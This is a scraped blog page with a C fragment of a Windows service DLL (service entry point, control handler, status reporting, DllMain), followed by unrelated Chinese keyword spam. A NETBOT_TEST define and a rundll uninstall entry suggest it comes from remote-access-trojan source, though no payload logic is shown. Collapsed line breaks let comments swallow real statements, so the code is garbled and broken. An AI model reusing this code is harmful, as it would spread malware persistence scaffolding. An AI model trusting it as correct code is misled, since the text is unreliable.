RundllUninstall(HWND hwnd, HINSTANCE hinst, char *param, int nCmdShow){Uninstall();}//////////////////////////////////////////////////////////////////////////////////////////////////////Service HANDLE & STATUS used to get service stateSERVICE_STATUS_HANDLE hSrv;DWORD dwCurrState;void __stdcall ServiceMain(DWORD dwArgc, wchar_t* argv[]){char svcname[256];strncpy(svcname, (char*)argv[0], sizeof svcname); //it's should be unicode, but if it's ansi we do it wellwcstombs(svcname, argv[0], sizeof svcname);hSrv = RegisterServiceCtrlHandler(svcname, (LPHANDLER_FUNCTION)ServiceHandler );    if( hSrv == NULL )return;else FreeConsole();TellSCM( SERVICE_START_PENDING, 0, 1 );TellSCM( SERVICE_RUNNING, 0, 0 );//Run My Main Code=============HANDLE hThread = CreateThread(NULL,NULL,RuningThread,NULL,NULL,NULL);WaitForSingleObject(hThread, INFINITE);CloseHandle(hThread);    do{Sleep(100);//not quit until receive stop command, otherwise the service will stop}while(dwCurrState != SERVICE_STOP_PENDING && dwCurrState != SERVICE_STOPPED);}void __stdcall ServiceHandler( DWORD dwCommand ){    switch( dwCommand )    {    case SERVICE_CONTROL_STOP:        TellSCM( SERVICE_STOP_PENDING, 0, 1 );Sleep(10);        TellSCM( SERVICE_STOPPED, 0, 0 );        break;    case SERVICE_CONTROL_PAUSE:        TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );        TellSCM( SERVICE_PAUSED, 0, 0 );        break;    case SERVICE_CONTROL_CONTINUE:        TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );        TellSCM( SERVICE_RUNNING, 0, 0 );        break;    case SERVICE_CONTROL_INTERROGATE:        TellSCM( dwCurrState, 0, 0 );        break;    case SERVICE_CONTROL_SHUTDOWN:        TellSCM( SERVICE_STOPPED, 0, 0 );break;    }}int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress ){      SERVICE_STATUS srvStatus;      srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;      srvStatus.dwCurrentState = dwCurrState = dwState;      srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;      srvStatus.dwWin32ExitCode = dwExitCode;      srvStatus.dwServiceSpecificExitCode = 0;      srvStatus.dwCheckPoint = dwProgress;      srvStatus.dwWaitHint = 3000;      return SetServiceStatus( hSrv, &srvStatus );}BOOL APIENTRY DllMain( HINSTANCE hModule,                        DWORD  ul_reason_for_call,                        LPVOID lpReserved ){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:g_hDllModule = (HMODULE)hModule;    #ifdef NETBOT_TESTCreateThread(NULL,NULL,RuningThread,NULL,NULL,NULL);    #endif //NETBOT_TESTbreak;case DLL_THREAD_ATTACH:break;case DLL_THREAD_DETACH:break;case DLL_PROCESS_DETACH:break;    }    return TRUE;}


 

java多进程同步 java多进程同步
原创粉丝点击
热门IT博客
下载百度一下软件下载百度一下软件
淘宝直播小陈珍珠淘宝直播小陈珍珠
笔趣阁软件哪里下载
携程软件下载
硬笔行书 知乎
cocostudio 3.10 mac
阿里云人工智能平台
淘宝装修 学什么代码
淘宝2016年全年交易额
pdfedit的编辑软件
项目管理软件 cms
ssm 打印sql
友情链接交换平台源码
ubuntu编译openjdk7
淘宝图片空间协议
电商 用户数据分析
淘宝网店女鞋图片
互盾数据恢复破解版pc
淘宝链接权重
洛天依软件百度云
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 蔡骏人间 蔡骏.作品 旋转门蔡骏 人间蔡骏 蔡骏 地狱十九层 蔡骏天机到底讲的什么 十八层地狱 蔡骏 蔡齐 李岷城老婆蔡齐 打蔫 蔫儿 蔫坏蔫坏 蔫吧 观音莲蔫了 仙人掌蔫了怎么办 花蔫了 蔫坏是什么意思 虎皮兰蔫了 虎皮鹦鹉打蔫 晒蔫的意思 蔫的拼音 梦见花蔫了 蔬果造型 健康养生蔬果汁100种 蔬果汁搭配与功效大全 健康蔬果汁自制大全 降血压的蔬果 完达山蔬果乳饮品 蔬莱水果连连看 蔬菜英文 蔬菜的英文 蔬菜图片 蔬菜英语 蔬菜粥 秋天蔬菜 蔬菜虾仁粥 蔬菜疙瘩汤 多吃蔬菜 孕妇蔬菜 蔬菜汤 蔬菜的图片

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里